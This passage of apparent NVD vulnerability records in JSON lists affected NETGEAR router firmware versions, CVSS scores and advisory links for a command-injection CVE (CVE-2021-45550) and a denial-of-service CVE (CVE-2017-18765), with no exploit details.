"matchCriteriaId": "CC3FB181-FC5C-4752-9BB1-5BBECEB7774C",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8DE5478F-11CE-4730-AC60-64ACE7BBB03A",
"versionEndExcluding": "1.0.0.63",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B185396-F010-45EF-B533-0AD61C095273",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58E68C65-9685-40E8-8D51-6C922232168B",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C35893A-C6C2-45C7-B3AF-BCFA62381BE5",
"versionEndExcluding": "1.0.1.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C329B7CB-1281-480D-BDDB-E222044D715E",
"versionEndExcluding": "1.0.3.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C3C53AE6-606A-416D-9AA5-DAAAFFFC1CCC",
"versionEndExcluding": "1.0.0.109",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1DD1F7D-7556-4B95-A33F-E389948D20AA",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CC022BD-49D5-442A-B76D-663923A52B8D",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BF91E85-8869-4421-8748-C7856C06435B",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E03D5017-31C2-425A-A5DA-A4E1FF8C5BBC",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B98D6EA5-F107-45C6-9312-BEE78B4644A9",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6156A20E-83E6-44AD-9A57-40E3249047D4",
"versionEndExcluding": "1.0.9.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0870C337-6BCE-4197-A9DE-6CED2B45AD58",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "084129BF-E2BA-4DE2-A39F-E65AD8F0756B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845CF217-8361-4D5B-811D-B9CEB68880CB",
"versionEndExcluding": "1.0.3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BBB7E16-D31C-49EA-9D82-D3BACED95441",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98FAEBDA-5FBA-402D-9BA1-25E5DF4EF55F",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6791754E-E5F9-42EA-AFDA-F93E8227A7C8",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD0AB065-3152-492B-A66D-2BCCA1E3B1DA",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28EC6190-68BC-4D9A-9973-01935EB3472F",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A8D88D16-F42A-412D-81A6-BD6CA2E08595",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1748207-4BAA-4CC2-AD44-19D895B1C08B",
"versionEndExcluding": "1.2.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA9B22EF-5791-41DB-8CC1-A1B60CF4A73F",
"versionEndExcluding": "2.3.2.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9E203D92-F97B-4F5B-B395-3A5DEDBF1C1C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comandos por parte de un usuario autenticado. Esto afecta a D3600 versiones anteriores a 1.0.0.76, D6000 versiones anteriores a 1.0.0.78, D6100 versiones anteriores a 1.0.0.63, D6220 versiones anteriores a 1.0.0.52, D6400 versiones anteriores a 1.0.0.86, D7800 versiones anteriores a 1.0.1.56, D8500 versiones anteriores a 1.0.3.44, DGN2200Bv4 versiones anteriores a 1. 0.0.109, DGN2200v4 versiones anteriores a 1.0.0.110, R6250 versiones anteriores a 1.0.4.34, R6300v2 versiones anteriores a 1.0.4.34, R6400 versiones anteriores a 1.0.1.46, R6400v2 versiones anteriores a 1.0.2.66, R6700 versiones anteriores a 1.0.2.6, R6700v3 versiones anteriores a 1.0. 2.66, R6900 versiones anteriores a 1.0.2.4, R6900P versiones anteriores a 1.3.1.64, R7000 versiones anteriores a 1.0.9.42, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.50, R7300 versiones anteriores a 1.0.0.70, R7900 versiones anteriores a 1.0.3.8, R7900P versiones anteriores a 1. 4.1.30, R8000 versiones anteriores a 1.0.4.28, R8000P versiones anteriores a 1.4.1.30, R8300 versiones anteriores a 1.0.2.128, R8500 versiones anteriores a 1.0.2.128, WNDR3400v3 versiones anteriores a 1.0.1.24, WNR3500Lv2 versiones anteriores a 1.2.0.62 y XR500 versiones anteriores a 2.3.2.56"
}
],
"id": "CVE-2021-45550",
"lastModified": "2024-11-21T06:32:29.523",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-12-26T01:15:15.367",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 16:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | wnr3500l_firmware | * | |
| netgear | wnr3500l | v2 | |
| netgear | wnr2000_firmware | * | |
| netgear | wnr2000 | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "43A9840B-1C54-4987-A179-EE8F8F8685FC",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB7B08B9-07D2-4404-846A-D1CA02C16557",
"versionEndExcluding": "1.0.2.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA5CCA76-ED97-4B2E-AB06-9C9F375F7C81",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7A7A9C9-3505-440C-8806-E48AB316C2CC",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7CE20879-71BC-433E-A8B0-D1004A016B34",
"versionEndExcluding": "1.2.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9A59121-B980-46B4-ABB8-13DEAE8F3923",
"versionEndExcluding": "1.2.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C5085749-A0E2-448D-B26B-7E25400F1C12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una denegaci\u00f3n de servicio. Esto afecta a R6300v2 versiones anteriores a 1.0.4.8, R6400 versiones anteriores a 1.0.1.22, R6400v2 versiones anteriores a 1.0.2.32, R6700 versiones anteriores a 1.0.1.20, R6900 versiones anteriores a 1.0.1.20, WNR3500Lv2 versiones anteriores a 1.2.0.44 y WNR2000v2 versiones anteriores a 1.2.0.8."
}
],
"id": "CVE-2017-18765",
"lastModified": "2024-11-21T03:20:51.913",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
